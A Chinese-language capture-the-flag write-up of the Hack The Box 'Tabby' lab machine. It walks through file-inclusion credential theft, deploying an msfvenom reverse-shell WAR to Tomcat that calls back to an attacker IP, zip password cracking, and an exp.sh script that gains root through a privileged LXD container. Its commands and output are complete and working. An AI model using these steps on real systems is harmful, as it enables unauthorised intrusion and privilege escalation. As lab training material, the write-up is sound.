HTB-[tabby]

0x00.简述

0x01.信息收集

可以看开放了22/80/8080(tomcat)端口

root@JIYE:~/htb/tabby# nmap -sC -sV -sT 10.10.10.194 -oN nmap.CVT
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-09 02:59 EDT
Nmap scan report for 10.10.10.194
Host is up (0.39s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open  http    Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.64 seconds
root@JIYE:~/htb/tabby#

0x02.先访问80端口

发现是一个卖服务器的

手动爬虫，发现NEW页面不能访问，并跳转到了如下页面

添加一条hosts再访问，提到了数据泄露，并且感觉存在文件包含

10.10.10.194 megahosting.htb

测试文件包含，是确实存在的

0x03.访问tomcat

1.发现敏感目录及文件

/var/lib/tomcat9/webapps/ROOT/index.html

/usr/share/tomcat9

/var/lib/tomcat9

/usr/share/doc/tomcat9-common/RUNNING.txt.gz

/etc/tomcat9/tomcat-users.xml

2.包含敏感文件

百度发现tomcat-users.xml为用户登录配置文件

经过不懈努力发现文件位置

/usr/share/tomcat9/etc/tomcat-users.xml

查看源码发现用户密码

0x04.构造exploit

tomcat相关参考

生成exp

root@JIYE:~/htb/tabby# msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.17.216 lport=6666 -f war > exp.war
Payload size: 1086 bytes
Final size of war file: 1086 bytes

root@JIYE:~/htb/tabby#

上传exp

root@JIYE:~/htb/tabby# curl --user 'tomcat:$3cureP4s5w0rd123!' --upload-file exp.war "http://10.10.10.194:8080/manager/text/deploy?path=/exp.war"
OK - Deployed application at context path [/exp.war]

kali监听

root@JIYE:~/htb/tabby# nc -nvlp 6666
listening on [any] 6666 ...

访问http://10.10.10.194:8080/exp.war反弹shell

root@JIYE:~/htb/tabby# nc -nvlp 6666
listening on [any] 6666 ...
connect to [10.10.17.216] from (UNKNOWN) [10.10.10.194] 51532
whoami
tomcat

升级shell

python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'        
tomcat@tabby:/var/lib/tomcat9$ whoami
whoami
tomcat
tomcat@tabby:/var/lib/tomcat9$

升级为交互shell

tomcat@tabby:/var/lib/tomcat9$ ^Z
[1]+  已停止               nc -nvlp 6666
root@JIYE:~/htb/tabby# stty raw -echo
root@JIYE:~/htb/tabby# nc -nvlp 6666

tomcat@tabby:/var/lib/tomcat9$ 
tomcat@tabby:/var/lib/tomcat9$ whoami
tomcat

0x05.寻找有用的信息

在网站根目录下发现files文件，文件中有一个backup,zip文件，猜测为备份文件

tomcat@tabby:/var/www/html$ ls
assets  favicon.ico  files  index.php  logo.png  news.php  Readme.txt
tomcat@tabby:/var/www/html$ cd files/
tomcat@tabby:/var/www/html/files$ ls
16162020_backup.zip  archive  revoked_certs  statement

下载backup.zip，并解压，发现需要密码

使用fcrackzip爆破解压密码为admin@it

root@JIYE:~/htb/tabby# fcrackzip -b -D -p /usr/share/wordlists/rockyou.txt 16162020_backup.zip 
possible pw found: admin@it ()
root@JIYE:~/htb/tabby#

解压得到了一个war目录，也没发现啥玩意

但拿admin@it登入ash却成功了。。。什么原理~

tomcat@tabby:/home$ ls
ash
tomcat@tabby:/home$ su ash
Password: 
ash@tabby:/home$ 
ash@tabby:/home$ ls
ash
ash@tabby:/home$ cd
ash@tabby:~$ ls
alpine-v3.12-i686-20200909_0437.tar.gz    index.html  tmp
alpine-v3.12-x86_64-20200909_1417.tar.gz  snap        user.txt
ash@tabby:~$ cat user.txt 
*************************************
ash@tabby:~$

0x06.提权

本次使用lxd

LXC/LXD参考1

LXC/LXD参考2

先生成apline映像

root@JIYE:~/htb/tabby# git clone https://github.com/saghul/lxd-alpine-builder.git
正克隆到 'lxd-alpine-builder'...
remote: Enumerating objects: 27, done.
remote: Total 27 (delta 0), reused 0 (delta 0), pack-reused 27
展开对象中: 100% (27/27), 15.98 KiB | 185.00 KiB/s, 完成.
root@JIYE:~/htb/tabby# ls
16162020_backup.zip  exp.war  lxd-alpine-builder  nmap.CVT  user
root@JIYE:~/htb/tabby# cd lxd-alpine-builder/
root@JIYE:~/htb/tabby/lxd-alpine-builder# ls
build-alpine  LICENSE  README.md
root@JIYE:~/htb/tabby/lxd-alpine-builder# ./build-alpine 
Determining the latest release... v3.12
Using static apk from http://dl-cdn.alpinelinux.org/alpine//v3.12/main/x86_64
Downloading alpine-mirrors-3.5.10-r0.apk
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
Downloading alpine-keys-2.2-r0.apk
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
Downloading apk-tools-static-2.10.5-r1.apk
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
alpine-devel@lists.alpinelinux.org-4a6a0840.rsa.pub: 成功
Verified OK
Selecting mirror http://dl-3.alpinelinux.org/alpine/v3.12/main
fetch http://dl-3.alpinelinux.org/alpine/v3.12/main/x86_64/APKINDEX.tar.gz
(1/19) Installing musl (1.1.24-r9)
(2/19) Installing busybox (1.31.1-r19)
Executing busybox-1.31.1-r19.post-install
(3/19) Installing alpine-baselayout (3.2.0-r7)
Executing alpine-baselayout-3.2.0-r7.pre-install
Executing alpine-baselayout-3.2.0-r7.post-install
(4/19) Installing openrc (0.42.1-r11)
Executing openrc-0.42.1-r11.post-install
(5/19) Installing alpine-conf (3.9.0-r1)
(6/19) Installing libcrypto1.1 (1.1.1g-r0)
(7/19) Installing libssl1.1 (1.1.1g-r0)
(8/19) Installing ca-certificates-bundle (20191127-r4)
(9/19) Installing libtls-standalone (2.9.1-r1)
(10/19) Installing ssl_client (1.31.1-r19)
(11/19) Installing zlib (1.2.11-r3)
(12/19) Installing apk-tools (2.10.5-r1)
(13/19) Installing busybox-suid (1.31.1-r19)
(14/19) Installing busybox-initscripts (3.2-r2)
Executing busybox-initscripts-3.2-r2.post-install
(15/19) Installing scanelf (1.2.6-r0)
(16/19) Installing musl-utils (1.1.24-r9)
(17/19) Installing libc-utils (0.7.2-r3)
(18/19) Installing alpine-keys (2.2-r0)
(19/19) Installing alpine-base (3.12.0-r0)
Executing busybox-1.31.1-r19.trigger
OK: 8 MiB in 19 packages
root@JIYE:~/htb/tabby/lxd-alpine-builder#
root@JIYE:~/htb/tabby/lxd-alpine-builder# ls
alpine-v3.12-x86_64-20200909_1548.tar.gz  build-alpine  LICENSE  README.md
root@JIYE:~/htb/tabby/lxd-alpine-builder#

上传

root@JIYE:~/htb/tabby/lxd-alpine-builder# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

ash@tabby:/tmp$ wget http://10.10.17.216/exp.sh
--2020-09-10 01:35:29--  http://10.10.17.216/exp.sh
Connecting to 10.10.17.216:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 582 [text/x-sh]
Saving to: ‘exp.sh’

exp.sh              100%[===================>]     582  --.-KB/s    in 0s      

2020-09-10 01:35:30 (72.2 MB/s) - ‘exp.sh’ saved [582/582]

<.10.17.216/alpine-v3.12-x86_64-20200909_1548.tar.gz
--2020-09-10 01:38:02--  http://10.10.17.216/alpine-v3.12-x86_64-20200909_1548.tar.gz
Connecting to 10.10.17.216:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3201921 (3.1M) [application/gzip]
Saving to: ‘alpine-v3.12-x86_64-20200909_1548.tar.gz’

alpine-v3.12-x86_64 100%[===================>]   3.05M   665KB/s    in 9.5s    

2020-09-10 01:38:12 (328 KB/s) - ‘alpine-v3.12-x86_64-20200909_1548.tar.gz’ saved [3201921/3201921]

ash@tabby:/tmp$ ls
alpine-v3.12-x86_64-20200909_1548.tar.gz   hsperfdata_tomcat
ash@tabby:/tmp$

root@JIYE:~/htb/tabby/lxd-alpine-builder# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.194 - - [09/Sep/2020 20:42:27] "GET /alpine-v3.12-x86_64-20200909_1548.tar.gz HTTP/1.1" 200 -

构造shell脚本

root@JIYE:~/htb/tabby# cat exp.sh 
#!/bin/bash
echo "--------------lxc image import---------------"
lxc image import ./alpine-v3.12-x86_64-20200909_1548.tar.gz --alias fjy
echo "--------------lxc image list-----------------"
lxc image list
echo "----------lxc container creating-------------"
lxd init
echo "--------lxc security.privileged=true---------"
lxc init fjy fjy-tabby -c security.privileged=true
echo "------------lxc config device----------------"
lxc config device add fjy-tabby mydevice disk source=/ path=/mnt/root recursive=true
echo "--------------lxc starting-------------------"
lxc start fjy-tabby
root@JIYE:~/htb/tabby#

上传

root@JIYE:~/htb/tabby# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

ash@tabby:/tmp$ wget http://10.10.17.216/exp.sh
--2020-09-10 01:35:29--  http://10.10.17.216/exp.sh
Connecting to 10.10.17.216:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 582 [text/x-sh]
Saving to: ‘exp.sh’

exp.sh              100%[===================>]     582  --.-KB/s    in 0s      

2020-09-10 01:35:30 (72.2 MB/s) - ‘exp.sh’ saved [582/582]

ash@tabby:/tmp$

root@JIYE:~/htb/tabby# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.194 - - [09/Sep/2020 21:06:20] "GET /exp.sh HTTP/1.1" 200 -

执行

ash@tabby:~/tmp$ ls
alpine-v3.12-x86_64-20200910_2121.tar.gz  exp.sh
ash@tabby:~/tmp$ ./exp.sh 
--------------lxc image import---------------
--------------lxc image list-----------------
+-------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| ALIAS | FINGERPRINT  | PUBLIC |          DESCRIPTION          | ARCHITECTURE |   TYPE    |  SIZE  |         UPLOAD DATE          |
+-------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| fjy   | 24645e832789 | no     | alpine v3.12 (20200910_21:21) | x86_64       | CONTAINER | 3.05MB | Sep 11, 2020 at 2:31am (UTC) |
+-------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
----------lxc container creating-------------
Would you like to use LXD clustering? (yes/no) [default=no]: yes
What name should be used to identify this node in the cluster? [default=tabby]: 
What IP address or DNS name should be used to reach this node? [default=10.10.10.194]: 
Are you joining an existing cluster? (yes/no) [default=no]: 
Setup password authentication on the cluster? (yes/no) [default=yes]: 
Trust password for new clients: 
Again: 
Do you want to configure a new local storage pool? (yes/no) [default=yes]: 
Name of the storage backend to use (zfs, btrfs, dir, lvm) [default=zfs]: 
Create a new ZFS pool? (yes/no) [default=yes]: 
Would you like to use an existing block device? (yes/no) [default=no]: 
Size in GB of the new loop device (1GB minimum) [default=15GB]: 
Do you want to configure a new remote storage pool? (yes/no) [default=no]: 
Would you like to connect to a MAAS server? (yes/no) [default=no]: 
Would you like to configure LXD to use an existing bridge or host interface? (yes/no) [default=no]: 
Would you like to create a new Fan overlay network? (yes/no) [default=yes]: 
What subnet should be used as the Fan underlay? [default=auto]: 
Would you like stale cached images to be updated automatically? (yes/no) [default=yes] 
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]: 
--------lxc security.privileged=true---------
Creating fjy-tabby
------------lxc config device----------------
Device mydevice added to fjy-tabby
--------------lxc starting-------------------
ash@tabby:~/tmp$ lxc exec fjy-tabby /bin/sh
~ # ls
~ # whoami
root
~ # cd /mnt/root/
/mnt/root # ls
bin         home        lost+found  root        swap.img
boot        lib         media       run         sys
cdrom       lib32       mnt         sbin        tmp
dev         lib64       opt         snap        usr
etc         libx32      proc        srv         var
/mnt/root # cd root/
/mnt/root/root # ls
root.txt  snap
/mnt/root/root # cat root.txt 
*************************
/mnt/root/root #